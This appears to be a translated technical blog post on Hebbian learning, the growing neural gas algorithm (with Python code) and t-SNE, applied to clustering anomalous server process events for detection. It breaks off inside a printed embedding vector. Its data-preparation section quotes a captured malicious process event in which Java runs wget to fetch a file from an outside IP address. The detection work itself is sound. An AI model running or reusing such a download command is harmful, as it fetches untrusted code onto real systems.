Hebbian theory is a neuroscience theory proposing an explanation for how neurons in the brain adapt during learning: a basic mechanism of synaptic plasticity in which an increase in synaptic efficacy arises from the presynaptic cell's repeated and persistent stimulation of the postsynaptic cell. Hebbian theory holds that if neuron A keeps stimulating neuron B during training, once the stimulation reaches sufficient strength both A and B change, and the synapse is relatively permanently strengthened (growing)
The theory attempts to explain associative or Hebbian learning, in which simultaneous activation of cells leads to pronounced increases in synaptic strength between those cells, and provides a biological basis for errorless learning methods for education and memory rehabilitation. In the study of neural networks in cognitive function, it is often regarded as the neuronal basis of unsupervised learning.
The general idea is an old one, that any two cells or systems of cells that are repeatedly active at the same time will tend to become 'associated', so that activity in one facilitates activity in the other.
That is, neuron activation is bidirectional, and this bidirectionality is expressed through the relation of "mutual association"
From the point of view of artificial neurons and artificial neural networks, Hebb's principle can be described as a method of determining how to alter the weights between model neurons. The weight between two neurons increases if the two neurons activate simultaneously, and reduces if they activate separately. Nodes that tend to be either both positive or both negative at the same time have strong positive weights, while those that tend to be opposite have strong negative weights.
The following is a formulaic description of Hebbian learning (note that many other descriptions are possible):

w_ij = x_i · x_j

where w_ij is the weight of the connection from neuron j to neuron i and x_i the input for neuron i. Note that this is pattern learning (weights updated after every training example). With binary neurons (activations either 0 or 1), connections would be set to 1 if the connected neurons have the same activation for a pattern.
Another formulaic description is:

w_ij = (1/p) · Σ_{k=1}^{p} x_i^k · x_j^k

where w_ij is the weight of the connection from neuron j to neuron i, p is the number of training patterns, and x_i^k the k-th input for neuron i. This is learning by epoch (weights updated after all the training examples are presented).
Hebb's Rule is often generalized as

Δw_i = η · x_i · y

or: the change in the i-th synaptic weight w_i is equal to a learning rate η times the i-th input x_i times the postsynaptic response y. Often cited is the case of a linear neuron, y = Σ_j w_j · x_j
0x2: Background of growing neural gas
In the 1990s, artificial neural network researchers concluded that it was necessary to develop a new class of computational mechanisms without a fixed topology of network layers: the number and placement of artificial neurons in feature space would not be specified in advance, but computed during model learning from the properties of the input data, adjusting and adapting on their own. Note that CNN/RNN fix the network's neuron topology before training starts, and training only adjusts the parameters of those neurons; in unsupervised scenarios we usually cannot know the topological distribution of the input data space in advance
The idea arose from a batch of practical problems where the compression and vector quantization of inputs with many parameters had stalled, such as speech and image recognition, or classification and recognition of abstract patterns. This includes the scenario this article focuses on: in anomalous process events, the input data often differ in length, and feeding them into a deep neural network (DNN/CNN) requires cutting and compression, which may lose part of the input data's topological structure
Since self-organizing maps and Hebbian learning were already known at the time (especially algorithms that generate network topology, i.e. create a set of connections between neurons that form a "skeleton" layer), and methods of "soft" competitive learning had been worked out (processes in which weights adapt not only for the "winner" neuron but also for its "neighbors": the neurons that lost this round of competition also adjust their parameters a little, striving to succeed next time), the logical step was to combine these methods, which the German scientist Bernd Fritzke did in 1995, creating today's popular algorithm "growing neural gas" (GNG)
The method proved so successful that a series of modified versions derived from it appeared; one of them is an adaptation for supervised learning (Supervised-GNG). According to its author, S-GNG shows far stronger data-classification efficiency than radial basis function networks, thanks to its ability to optimize the topology in regions of the input space that are hard to classify. Without question, GNG outperforms "K-means" clustering
0x3: Algorithm sketch
GNG is an algorithm that enables adaptive clustering of input data: it not only partitions the space into clusters, but also determines the required number of clusters from the properties of the data
The algorithm starts with only two neurons and keeps changing their number (mostly growing it), while using competitive Hebbian learning to build, among the neurons, the set of connections that best matches the distribution of the input vectors. Every neuron has an internal variable accumulating a so-called "local error". Connections between nodes are characterized by a variable called "age"
- Initialization: create two nodes with weight vectors (of the dimensionality allowed by the input vector distribution) and zero local error (the local error stores the mismatch between the neuron and the input vectors); connect the two nodes with an edge of age 0
- Training data: feed an input training vector x into the neural network
- Find the 2 neurons closest to the input training sample: find the two nearest neurons s_1 and s_2, i.e. the nodes with weight vectors w_{s_1} and w_{s_2} such that ||x − w_{s_1}||² is the smallest distance among all nodes and ||x − w_{s_2}||² the second smallest
- Grow the winner's error variable: update the winner neuron s_1's local error by adding to it the squared distance between w_{s_1} and x (this step essentially lets the neuron learn the input data's topology): error(s_1) ← error(s_1) + ||x − w_{s_1}||². This shows that the nodes that win most often (i.e. those whose neighborhoods receive the largest number of input signals) accumulate the largest error, so these regions are also the prime candidates for "densification" by adding new nodes. The error added this round may, in the neuron-growth step of a later round, cause this node to be judged the maximum-error node and have a new neuron inserted next to it. The intuition: once a topological structure is found, we shrink ever "tighter" structures around it to trace it, somewhat like the feeling of outlining an object's edges when drawing
- Influence radiation (the core idea of local weight updates): move the winner s_1 and all of its topological neighbors (all neurons connected to it) toward the input vector x, by a fraction e_b of the full distance for the winner and e_n for the neighbors (the surrounding neurons update their weight vectors toward the input vector in proportion to these fractions). The best neuron thus "pulls" its neighbors slightly in the direction of the signal (similar to the SOM idea)
- Neuron connection counting: increase by 1 the age of all connections emanating from the winner s_1
- Reset the age of the activated connection: if the two best neurons s_1 and s_2 are already connected, set the age of their connection to zero; otherwise create a connection between them. This step mimics how connections between brain neurons keep track of the latest stimulation: if no stimulus passes between two neurons for a long time, the connection is deleted after a certain number of cycles, much as we forget a topic we have not reviewed for too long
- Delete over-aged connections: remove connections with age greater than a_max. If this leaves neurons with no more emanating edges (isolated neurons), remove those neurons too. The aging and removal of connections means the network topology should approach, as closely as possible, the so-called Delaunay triangulation of the neurons (a subdivision into triangles in which, in particular, the minimum of all the triangles' angles is maximized, avoiding "skinny" triangles). Put simply, in the sense of maximum entropy of the layer's topology, the Delaunay triangulation is the "most beautiful". Note that the topology is not required as an independent artifact here; it is used to determine where new nodes are inserted, which is always at the middle of some edge
- Neuron growth: if the number of the current iteration is a multiple of λ and the limit size of the network has not been reached, insert a new neuron r as follows:
    - Determine the neuron q with the maximum local error. Inserting a new neuron at the position of the largest error (i.e. at the currently least relevant neuron) raises the potential of the network; the inserted new nodes may gradually gain relevance through later learning, and it is exactly through this expansion that GNG learns the topology of the input vectors step by step
    - Among q's neighbors, determine the neuron f with the maximum error. Note that we do not directly take the global top-1/2 maximum accumulated-error nodes; the essence of this is to let the network "grow" outward from the maximum-error node q
    - Create a node r "centered" between q and f: w_r = (w_q + w_f) / 2
    - Replace the edge between q and f with edges between q and r, and between r and f, like inserting a new node into a linked list
    - Decrease the errors of q and f (multiplying them by a constant factor), and set the error of neuron r to the new error value of q
- One more step of learning the input topology: decrease the error of every neuron (all other neurons) by a fraction d: error(j) ← error(j) · d. Correcting the error variables of all neurons in the layer ensures the network "forgets" the original input vectors and responds better to new ones; this gives us the possibility of using growing neural gas for time-dependent networks, i.e. slowly drifting distributions of the input signal
- If the stopping condition is not met, continue from step 2
The video below shows the grid gradually adapting to the incoming data as it tries to cover the space according to the growing density of the blue points
0x4: Python code example
# -*- coding: utf-8 -*-
import mdp
import numpy as np
import matplotlib.pyplot as plt

np.random.seed(0)  # obtain reproducible results
mdp.numx_rand.seed(1266090063)

N = 2000

def uniform(min_, max_, dims):
    """Return a random number between min_ and max_ ."""
    return mdp.numx_rand.random(dims) * (max_ - min_) + min_

# Return n random points vector(n dims) uniformly distributed on a circumference, and radius is radius
def circumference_distr(center, radius, n):
    """Return n random points uniformly distributed on a circumference."""
    phi = uniform(0, 2 * mdp.numx.pi, (n, 1))
    # calculate radius coordinate
    x = radius * mdp.numx.cos(phi) + center[0]
    y = radius * mdp.numx.sin(phi) + center[1]
    # return a n dimension x/y pointer vector
    return mdp.numx.concatenate((x, y), axis=1)

def circle_distr(center, radius, n):
    """Return n random points uniformly distributed on a circle."""
    phi = uniform(0, 2 * mdp.numx.pi, (n, 1))
    sqrt_r = mdp.numx.sqrt(uniform(0, radius * radius, (n, 1)))
    x = sqrt_r * mdp.numx.cos(phi) + center[0]
    y = sqrt_r * mdp.numx.sin(phi) + center[1]
    return mdp.numx.concatenate((x, y), axis=1)

def rectangle_distr(center, w, h, n):
    """Return n random points uniformly distributed on a rectangle."""
    x = uniform(-w / 2., w / 2., (n, 1)) + center[0]
    y = uniform(-h / 2., h / 2., (n, 1)) + center[1]
    return mdp.numx.concatenate((x, y), axis=1)

'''
functions to generate uniform probability distributions on different geometrical objects
'''
# generate new random topology
cf1 = circumference_distr([6, -0.5], 2, N)
cf2 = circumference_distr([3, -2], 0.3, N)

# generate new random topology
cl1 = circle_distr([-5, 3], 0.5, N / 2)
cl2 = circle_distr([3.5, 2.5], 0.7, N)

# generate new random topology
r1 = rectangle_distr([-1.5, 0], 1, 4, N)
r2 = rectangle_distr([+1.5, 0], 1, 4, N)
r3 = rectangle_distr([0, +1.5], 2, 1, N / 2)
r4 = rectangle_distr([0, -1.5], 2, 1, N / 2)

'''
simulate real-world data: the topological structures in the training samples are mixed together
'''
# Shuffle the points to make the statistics stationary
x = mdp.numx.concatenate([cf1, cf2, cl1, cl2, r1, r2, r3, r4], axis=0)
x = mdp.numx.take(x, mdp.numx_rand.permutation(x.shape[0]), axis=0)

# show input train data
axis_x, axis_y = [], []
for axis_i in x:
    axis_x.append(axis_i[0])
    axis_y.append(axis_i[1])
plt.plot(axis_x, axis_y, 'ro')
plt.axis([min(axis_x), max(axis_x), min(axis_y), max(axis_y)])
plt.show()

# set the GNG stop condition(when grow at 75 node, stop it)
gng = mdp.nodes.GrowingNeuralGasNode(max_nodes=75)
print x.shape[0]

STEP = 500
for i in range(0, x.shape[0], STEP):
    gng.train(x[i:i + STEP])
    # [...] plotting instructions
gng.stop_training()

# show GNG Clustering result, means how many cluster it has been get
n_obj = len(gng.graph.connected_components())
print n_obj
The visualization of the input training sample set looks like the figure below

Note one spot:
STEP = 500
for i in range(0, x.shape[0], STEP):
    gng.train(x[i:i + STEP])
    # [...] plotting instructions
gng.stop_training()
For an unsupervised algorithm with local feature-weight updates like GNG, the network can dynamically add neurons as the input data set changes. That process is simulated here: each time, GNG is given a small data set of size 500 and learns its topological structure from that small set
Relevant Link:
https://github.com/kudkudak/Growing-Neural-Gas
https://cn.mathworks.com/matlabcentral/fileexchange/43665-unsupervised-learning-with-growing-neural-gas--gng--neural-network?
http://demogng.de/js/demogng.html?model=NG&showAutoRestart
https://en.wikipedia.org/wiki/Hebbian_theory
https://www.mql5.com/zh/articles/163
http://mdp-toolkit.sourceforge.net/code/examples/gng/gng.html
https://link.springer.com/chapter/10.1007/978-3-540-76725-1_71
https://books.google.com.hk/books?id=jU_7AAAAQBAJ&pg=PA85&lpg=PA85&dq=visualization+GrowingNeuralGas++training&source=bl&ots=zLGFbcubr8&sig=DJZClhiau3QhOGH2-oRwDd1GjDs&hl=zh-CN&sa=X&ved=0ahUKEwiYpvmYku_UAhVBMz4KHTvfDAEQ6AEIVzAH#v=onepage&q=visualization%20GrowingNeuralGas%20%20training&f=false
https://worldwidescience.org/topicpages/d/dynamically+growing+neural.html
https://papers.nips.cc/paper/893-a-growing-neural-gas-network-learns-topologies.pdf
http://tieba.baidu.com/p/2871986064?see_lz=1
8. Simple implementation of the "growing neural gas" artificial neural network
We feed the data points generated in the previous chapter into this GNG implementation and observe the network's self-learning and its accumulated error
# coding: utf-8
from sklearn import datasets
from sklearn.preprocessing import StandardScaler
from gng import GrowingNeuralGas
import os
import shutil
import mdp
import numpy as np

np.random.seed(0)  # obtain reproducible results
mdp.numx_rand.seed(1266090063)

# dim = N = 2000
N = 2000

def uniform(min_, max_, dims):
    """Return a random number between min_ and max_ ."""
    return mdp.numx_rand.random(dims) * (max_ - min_) + min_

# Return n random points vector(n dims) uniformly distributed on a circumference, and radius is radius
def circumference_distr(center, radius, n):
    """Return n random points uniformly distributed on a circumference."""
    phi = uniform(0, 2 * mdp.numx.pi, (n, 1))
    # calculate radius coordinate
    x = radius * mdp.numx.cos(phi) + center[0]
    y = radius * mdp.numx.sin(phi) + center[1]
    # return a n dimension x/y pointer vector
    return mdp.numx.concatenate((x, y), axis=1)

def circle_distr(center, radius, n):
    """Return n random points uniformly distributed on a circle."""
    phi = uniform(0, 2 * mdp.numx.pi, (n, 1))
    sqrt_r = mdp.numx.sqrt(uniform(0, radius * radius, (n, 1)))
    x = sqrt_r * mdp.numx.cos(phi) + center[0]
    y = sqrt_r * mdp.numx.sin(phi) + center[1]
    return mdp.numx.concatenate((x, y), axis=1)

def rectangle_distr(center, w, h, n):
    """Return n random points uniformly distributed on a rectangle."""
    x = uniform(-w / 2., w / 2., (n, 1)) + center[0]
    y = uniform(-h / 2., h / 2., (n, 1)) + center[1]
    return mdp.numx.concatenate((x, y), axis=1)

if __name__ == '__main__':
    if os.path.exists('visualization/sequence'):
        shutil.rmtree('visualization/sequence')
    os.makedirs('visualization/sequence')

    # generate new random topology
    cf1 = circumference_distr([6, -0.5], 2, N)
    cf2 = circumference_distr([3, -2], 0.3, N)

    # generate new random topology
    cl1 = circle_distr([-5, 3], 0.5, N / 2)
    cl2 = circle_distr([3.5, 2.5], 0.7, N)

    # generate new random topology
    r1 = rectangle_distr([-1.5, 0], 1, 4, N)
    r2 = rectangle_distr([+1.5, 0], 1, 4, N)
    r3 = rectangle_distr([0, +1.5], 2, 1, N / 2)
    r4 = rectangle_distr([0, -1.5], 2, 1, N / 2)

    # Shuffle the points to make the statistics stationary
    data = mdp.numx.concatenate([cf1, cf2, cl1, cl2, r1, r2, r3, r4], axis=0)
    data = mdp.numx.take(data, mdp.numx_rand.permutation(data.shape[0]), axis=0)

    '''
    n_samples = 2000
    dataset_type = 'moons'
    data = None
    print('Preparing data...')
    if dataset_type == 'blobs':
        data = datasets.make_blobs(n_samples=n_samples, random_state=8)
    elif dataset_type == 'moons':
        data = datasets.make_moons(n_samples=n_samples, noise=.05)
    elif dataset_type == 'circles':
        data = datasets.make_circles(n_samples=n_samples, factor=.5, noise=.05)
    data = StandardScaler().fit_transform(data[0])
    '''
    print('Done.')
    print('Fitting neural network...')
    print data
    gng = GrowingNeuralGas(data)
    gng.fit_network(e_b=0.1, e_n=0.006, a_max=10, l=200, a=0.5, d=0.995, passes=8, plot_evolution=True)
    print('Found %d clusters.' % gng.number_of_clusters())
    gng.plot_clusters(gng.cluster_data())
gng.py
# coding: utf-8
import numpy as np
from scipy import spatial
import networkx as nx
import matplotlib.pyplot as plt
from sklearn import decomposition

'''
Simple implementation of the Growing Neural Gas algorithm, based on:
A Growing Neural Gas Network Learns Topologies. B. Fritzke, Advances in
Neural Information Processing Systems 7, 1995.
'''

class GrowingNeuralGas:

    def __init__(self, input_data):
        self.network = None
        self.data = input_data
        self.units_created = 0
        plt.style.use('ggplot')

    def find_nearest_units(self, observation):
        distance = []
        for u, attributes in self.network.nodes(data=True):
            vector = attributes['vector']
            dist = spatial.distance.euclidean(vector, observation)
            distance.append((u, dist))
        distance.sort(key=lambda x: x[1])
        ranking = [u for u, dist in distance]
        return ranking

    def prune_connections(self, a_max):
        for u, v, attributes in self.network.edges(data=True):
            if attributes['age'] > a_max:
                self.network.remove_edge(u, v)
        for u in self.network.nodes():
            # degree = 0 means no node is connected
            if self.network.degree(u) == 0:
                self.network.remove_node(u)

    def fit_network(self, e_b, e_n, a_max, l, a, d, passes=1, plot_evolution=False):
        # logging variables
        accumulated_local_error = []
        global_error = []
        network_order = []
        network_size = []
        total_units = []
        self.units_created = 0
        # 0. start with two units a and b at random position w_a and w_b, in input data area
        w_a = [np.random.uniform(-2, 2) for _ in range(np.shape(self.data)[1])]
        w_b = [np.random.uniform(-2, 2) for _ in range(np.shape(self.data)[1])]
        self.network = nx.Graph()
        self.network.add_node(self.units_created, vector=w_a, error=0)
        self.units_created += 1
        self.network.add_node(self.units_created, vector=w_b, error=0)
        self.units_created += 1
        # 1. iterate through the data
        sequence = 0
        for p in range(passes):
            print('   Pass #%d' % (p + 1))
            np.random.shuffle(self.data)
            steps = 0
            for observation in self.data:
                # 2. find the nearest unit s_1 and the second nearest unit s_2
                nearest_units = self.find_nearest_units(observation)
                s_1 = nearest_units[0]
                s_2 = nearest_units[1]
                # 3. increment the age of all edges emanating from s_1
                for u, v, attributes in self.network.edges_iter(data=True, nbunch=[s_1]):
                    self.network.add_edge(u, v, age=attributes['age']+1)
                # 4. add the squared distance between the observation and the nearest unit in input space
                self.network.node[s_1]['error'] += spatial.distance.euclidean(observation, self.network.node[s_1]['vector'])**2
                # 5. move s_1 and its direct topological neighbors towards the observation by the fractions
                #    e_b(for s_1) and e_n(for others), respectively, of the total distance
                update_w_s_1 = e_b * (np.subtract(observation, self.network.node[s_1]['vector']))
                self.network.node[s_1]['vector'] = np.add(self.network.node[s_1]['vector'], update_w_s_1)
                update_w_s_n = e_n * (np.subtract(observation, self.network.node[s_1]['vector']))
                for neighbor in self.network.neighbors(s_1):
                    self.network.node[neighbor]['vector'] = np.add(self.network.node[neighbor]['vector'], update_w_s_n)
                # 6. if s_1 and s_2 are connected by an edge, set the age of this edge to zero
                #    if such an edge doesn't exist, create it
                self.network.add_edge(s_1, s_2, age=0)
                # 7. remove edges with an age larger than a_max
                #    if this results in units having no emanating edges, remove them as well
                self.prune_connections(a_max)
                # 8. if the number of steps so far is an integer multiple of parameter l, insert a new unit
                steps += 1
                if steps % l == 0:
                    if plot_evolution:
                        self.plot_network('visualization/sequence/' + str(sequence) + '.png')
                    sequence += 1
                    # 8.a determine the unit q with the maximum accumulated error
                    # a new neuron will be inserted between the two nodes with the largest accumulated error
                    q = 0
                    error_max = 0
                    for u in self.network.nodes_iter():
                        if self.network.node[u]['error'] > error_max:
                            error_max = self.network.node[u]['error']
                            q = u
                    # 8.b insert a new unit r halfway between q and its neighbor f with the largest error variable
                    f = -1
                    largest_error = -1
                    for u in self.network.neighbors(q):
                        # look for the other largest accumulated-error node within q's own topology
                        # (note: not the global top-1/2 maximum accumulated-error nodes)
                        if self.network.node[u]['error'] > largest_error:
                            largest_error = self.network.node[u]['error']
                            f = u
                    w_r = 0.5 * (np.add(self.network.node[q]['vector'], self.network.node[f]['vector']))
                    r = self.units_created
                    self.units_created += 1
                    # 8.c insert edges connecting the new unit r with q and f
                    #     remove the original edge between q and f
                    self.network.add_node(r, vector=w_r, error=0)
                    self.network.add_edge(r, q, age=0)
                    self.network.add_edge(r, f, age=0)
                    self.network.remove_edge(q, f)
                    # 8.d decrease the error variables of q and f by multiplying them with a
                    #     initialize the error variable of r with the new value of the error variable of q
                    self.network.node[q]['error'] *= a
                    self.network.node[f]['error'] *= a
                    self.network.node[r]['error'] = self.network.node[q]['error']
                # 9. decrease all error variables by multiplying them with a constant d
                error = 0
                for u in self.network.nodes_iter():
                    error += self.network.node[u]['error']
                accumulated_local_error.append(error)
                network_order.append(self.network.order())
                network_size.append(self.network.size())
                total_units.append(self.units_created)
                for u in self.network.nodes_iter():
                    self.network.node[u]['error'] *= d
                    if self.network.degree(nbunch=[u]) == 0:
                        print(u)
            global_error.append(self.compute_global_error())
        plt.clf()
        plt.title('Accumulated local error')
        plt.xlabel('iterations')
        plt.plot(range(len(accumulated_local_error)), accumulated_local_error)
        plt.savefig('visualization/accumulated_local_error.png')
        plt.clf()
        plt.title('Global error')
        plt.xlabel('passes')
        plt.plot(range(len(global_error)), global_error)
        plt.savefig('visualization/global_error.png')
        plt.clf()
        plt.title('Neural network properties')
        plt.plot(range(len(network_order)), network_order, label='Network order')
        plt.plot(range(len(network_size)), network_size, label='Network size')
        plt.legend()
        plt.savefig('visualization/network_properties.png')

    def plot_network(self, file_path):
        plt.clf()
        plt.scatter(self.data[:, 0], self.data[:, 1])
        node_pos = {}
        for u in self.network.nodes_iter():
            vector = self.network.node[u]['vector']
            node_pos[u] = (vector[0], vector[1])
        nx.draw(self.network, pos=node_pos)
        plt.draw()
        plt.savefig(file_path)

    def number_of_clusters(self):
        return nx.number_connected_components(self.network)

    def cluster_data(self):
        unit_to_cluster = np.zeros(self.units_created)
        cluster = 0
        for c in nx.connected_components(self.network):
            for unit in c:
                unit_to_cluster[unit] = cluster
            cluster += 1
        clustered_data = []
        for observation in self.data:
            nearest_units = self.find_nearest_units(observation)
            s = nearest_units[0]
            clustered_data.append((observation, unit_to_cluster[s]))
        return clustered_data

    def reduce_dimension(self, clustered_data):
        transformed_clustered_data = []
        svd = decomposition.PCA(n_components=2)
        transformed_observations = svd.fit_transform(self.data)
        for i in range(len(clustered_data)):
            transformed_clustered_data.append((transformed_observations[i], clustered_data[i][1]))
        return transformed_clustered_data

    def plot_clusters(self, clustered_data):
        number_of_clusters = nx.number_connected_components(self.network)
        plt.clf()
        plt.title('Cluster affectation')
        color = ['r', 'b', 'g', 'k', 'm', 'r', 'b', 'g', 'k', 'm']
        for i in range(number_of_clusters):
            observations = [observation for observation, s in clustered_data if s == i]
            if len(observations) > 0:
                observations = np.array(observations)
                plt.scatter(observations[:, 0], observations[:, 1], color=color[i], label='cluster #'+str(i))
        plt.legend()
        plt.savefig('visualization/clusters.png')

    def compute_global_error(self):
        global_error = 0
        for observation in self.data:
            nearest_units = self.find_nearest_units(observation)
            s_1 = nearest_units[0]
            global_error += spatial.distance.euclidean(observation, self.network.node[s_1]['vector'])**2
        return global_error
Relevant Link:
https://github.com/LittleHann/GrowingNeuralGas
9. Process event embedding space visualization
In this chapter we try to visualize the process-event input space. We make two attempts, in each case observing the training set's topological distribution in the high-dimensional space and assessing whether an unsupervised self-learning topology algorithm could be used for classification
1. ASCII-encoded vectors of process events: i.e. no processing at all; directly convert the event strings to ASCII codes, normalizing non-ASCII characters
2. Map process events into an embedding space, then observe the spatial distribution
Since the space after embedding is high-dimensional and cannot be visualized, we need TensorFlow projection (dimensionality-reducing projection). TensorFlow offers 3 reduction methods, each of which can reduce high-dimensional input to 2/3 dimensions
1. PCA: A straightforward technique for reducing dimensions is Principal Component Analysis (PCA). The Embedding Projector computes the top 10 principal components. The menu lets you project those components onto any combination of two or three. PCA is a linear projection, often effective at examining global geometry.
2. t-SNE: A popular non-linear dimensionality reduction technique is t-SNE. The Embedding Projector offers both two- and three-dimensional t-SNE views. Layout is performed client-side animating every step of the algorithm. Because t-SNE often preserves some local structure (local topological structure), it is useful for exploring local neighborhoods and finding clusters (local neighborhood clustering). Although extremely useful for visualizing high-dimensional data, t-SNE plots can sometimes be mysterious or misleading. See this great article for how to use t-SNE effectively.
3. Custom: You can also construct specialized linear projections based on text searches for finding meaningful directions in space. To define a projection axis, enter two search strings or regular expressions. The program computes the centroids of the sets of points whose labels match these searches, and uses the difference vector between centroids as a projection axis.
Here we lean toward t-SNE; before starting, let's briefly go over the basic principles of t-SNE
0x1: How t-SNE works
t-SNE evolved from SNE. SNE maps data points onto probability distributions through affinity transformations, in two main steps
1. SNE builds a probability distribution over pairs of high-dimensional objects such that similar objects have a higher probability of being picked and dissimilar objects a lower one
2. SNE then builds the probability distribution of those points in the low-dimensional space, making the two distributions as similar as possible
Understand that SNE is not a clustering algorithm; it is a pure dimensionality-reduction method. Although dimensionality-reduction methods can also be used for clustering (e.g. PCA), reduction is not the same as clustering: clustering has to consider preserving the spatial topology and the distortion of the data's information, while reduction can accept losing some relationships in the data
Also note that t-SNE is unsupervised dimensionality reduction. Unlike k-means and similar methods, it cannot learn something through training and then apply it to other data (k-means can train to obtain k centers and then use them on other data sets, i.e. keep predicting with the resulting model; t-SNE can only operate on the data in isolation, which is to say it only has fit_transform, no fit)
SNE first converts Euclidean distances into conditional probabilities to express the similarity between points; the standard definitions are given after this paragraph. Note that the KL divergence is asymmetric, so different distances in the low-dimensional map carry different penalty weights. Concretely: representing two nearby points with two widely separated points produces a larger cost (the map strives to fit the topology of the input data, separating reduced points that started out mixed together), whereas representing two distant points with two nearby points produces a relatively small cost. (Note: analogous to regression being easily influenced by outliers, but with the opposite effect: if two points in the input set belong to the same class yet lie far apart, t-SNE will not visibly contort itself to fit that topology, because doing so could deform and distort the whole reduced map; t-SNE prefers to learn local topological features.)
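For reference, the standard SNE similarity and cost (notation as in van der Maaten & Hinton's t-SNE paper):

p(j|i) = exp(−||x_i − x_j||² / (2σ_i²)) / Σ_{k≠i} exp(−||x_i − x_k||² / (2σ_i²))

C = Σ_i KL(P_i || Q_i) = Σ_i Σ_j p(j|i) · log( p(j|i) / q(j|i) )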
Although SNE provides good visualizations, it is hard to optimize, and it suffers from the "crowding problem"
The crowding problem means the clusters crowd together and cannot be separated. For example, some high-dimensional data may be represented well when reduced to 10 dimensions, yet yield no trustworthy map when reduced to two: if 10 dimensions contain 11 points that are pairwise equidistant, there is no faithful mapping in 2-D (where at most 3 points can be pairwise equidistant)
Later, Hinton et al. proposed the t-SNE method. It differs from SNE mainly as follows:
1. It uses a symmetric version of SNE, simplifying the gradient formula
2. In the low-dimensional space it uses a t-distribution instead of a Gaussian to express the similarity between two points
t-SNE uses the heavier-tailed t-distribution in the low-dimensional space to avoid the crowding problem and the optimization problems; its form is given below
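In the low-dimensional space, the Student t-distribution (one degree of freedom) similarity is, in the same standard notation:

q_ij = (1 + ||y_i − y_j||²)^(−1) / Σ_{k≠l} (1 + ||y_k − y_l||²)^(−1)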

The effectiveness of t-SNE can also be seen in the figure above (horizontal axis: distance; vertical axis: similarity): for points with high similarity, the t-distribution requires a slightly smaller distance in the low-dimensional space, while for points with low similarity it requires a larger distance. This is exactly what we want: points within the same cluster (small distances) aggregate more tightly, and points in different clusters (large distances) move farther apart
To summarize, the t-SNE gradient update has two major advantages (the gradient itself is written out below)
1. For dissimilar points, a small distance produces a large gradient that pushes the points apart
2. This repulsion is not unbounded (thanks to the denominator in the gradient), which keeps dissimilar points from flying infinitely far apart
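The gradient in question, in the standard symmetric t-SNE form, is:

∂C/∂y_i = 4 Σ_j (p_ij − q_ij) · (y_i − y_j) · (1 + ||y_i − y_j||²)^(−1)

The (1 + ||y_i − y_j||²)^(−1) factor is the denominator mentioned in point 2: it caps how strongly distant pairs are pushed apart.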

Before the actual embedding visualization of our vectorized process events, we experiment with GloVe's glove.6B.50d.txt (taking 2000 words as the input set, due to memory limits) to build an intuitive understanding of t-SNE
# -*- coding: utf-8 -*-
import sys
import codecs
import numpy as np
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE

def main():
    embeddings_file = "glove.6B.50d.txt"
    wv, vocabulary = load_embeddings(embeddings_file)
    print wv

    tsne = TSNE(n_components=2, random_state=0)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(wv[:2000, :])

    plt.scatter(Y[:, 0], Y[:, 1])
    for label, x, y in zip(vocabulary, Y[:, 0], Y[:, 1]):
        plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')
    plt.show()

def load_embeddings(file_name):
    with codecs.open(file_name, 'r', 'utf-8') as f_in:
        vocabulary, wv = zip(*[line.strip().split(' ', 1) for line in f_in])
    wv = np.loadtxt(wv)
    return wv, vocabulary

if __name__ == '__main__':
    main()

By zooming we can see that t-SNE clustered together the vectors for person names, countries, and numbers during the reduction



We can also see that the embedding tends to view "similarity" at the lexical level: in the number-cluster figure, for example, the vectors of the two words "average" and "100" are close in the space, indicating they are lexically similar words
0x2: Data preparation
For process event data, our input is no longer a single word but a string
【/alidata/server/java-1.7.0/jre/bin/java--->wget http://122.114.14.177:443/0233】
Consider the usual domains of embedding. In NLP the practice is tokenization-based word segmentation: remove stop words, split each line into a word list, then project all the words into a high-dimensional space via word2vec, for example

In that scenario, the smallest unit of the high-dimensional embedding projection is the word, and words carry lexical meaning between them. But for anomalous proc event analysis our input is text such as system process paths, commands and command-line arguments, which does not fully follow English lexical rules, and forcing word segmentation will not necessarily work well. The approach I take here is to split at the single ASCII-byte level: convert a string into a byte list, treat that byte list as a tokens list, and feed it to word2vec for vectorization training
The vocabulary obtained this way is a vector list over all printable characters appearing in the proc events (non-printable characters are replaced with an asterisk *); each entry has the form char: fixed-dimension vector

This vocabulary implicitly captures the spatial distribution of all bytes in our input training samples. Based on this byte vocabulary we encode the input training data, vectorizing the proc event data
【/alidata/server/java-1.7.0/jre/bin/java--->wget http://122.114.14.177:443/0233】 # list不符合語法格式,只是為了更好地說明 [ / -> [ 0.59714282, 0.37679183, -0.13539211, -0.21574022, -1.57938302, -1.30245042, 1.09084558, 0.33533755, 0.10160648, -0.94351053, -0.89119941, 0.9360534 , -0.049429 , -0.57279736, -0.71337068, 1.14892995, 0.35215536, 0.0852112 , -0.78632265, 0.81085622, -0.54747117, -0.60913062, -0.09570971, -0.71837091, -0.2764748 , -0.8151623 , 0.84955674, -0.79621959, -0.91263795, 0.34293383, 0.43339723, 0.30635354, 0.48956752, -1.39774013, -0.36642498, -0.2013521 , 0.5436489 , 0.72774071, -0.47494698, 1.23675036, 1.38604641, 1.08847427, 0.0431812 , -0.198581 , 0.31857485, 1.08838224, -0.60740733, -0.29728332, -0.615816 , 0.60823154, -1.01683962, 0.63892865, 0.61414808, -0.03426743, 1.10382259, 0.24938957, 0.78430104, 0.96887851, 0.79944056, -0.1019463 , 0.46713293, -0.43706536, -0.67273641, -0.15963455, -0.03622133, -0.44651356, 1.07551551, -0.63088369, 0.50392532, -0.09643231, 0.58205545, 1.16589665, -1.04136014, -0.96029615, -0.16790186, 1.36748314, -1.0902437 , 0.981516 , -0.7209636 , 0.41370934, -0.59447336, 0.17805393, 0.91182387, 1.95722759, -0.95928752, 0.80467302, 0.29865515, -2.24124193, -0.67857677, -0.14644423, -0.01632199, 0.46235159, 1.22244143, -0.35953546, 1.03811002, -0.33354485, 1.88231277, 0.73133749, -0.79095709, 0.44468221] a -> [-0.41443196, 0.18420711, -0.13121036, 0.81862319, -0.34593245, -0.65420032, -0.58184427, 0.41809925, 0.00556373, 0.35910133, -0.35164505, -0.00378603, 0.82029456, 0.36659929, 0.35976142, 0.54450631, 0.08224635, 1.10400426, -0.26469222, 0.26049149, 0.54612935, 0.71228462, 0.61439186, 0.78772676, -0.25354931, -0.75156778, 0.31653416, -0.03102924, 0.02468991, 0.05345058, 0.51047593, -0.2934207 , 0.91022635, 0.22595032, -1.10914123, -0.64377183, 0.32521901, 0.0080247 , 0.38606018, 0.46563849, 0.58037955, 0.12432346, 0.17022869, 0.44182771, 0.1541298 , 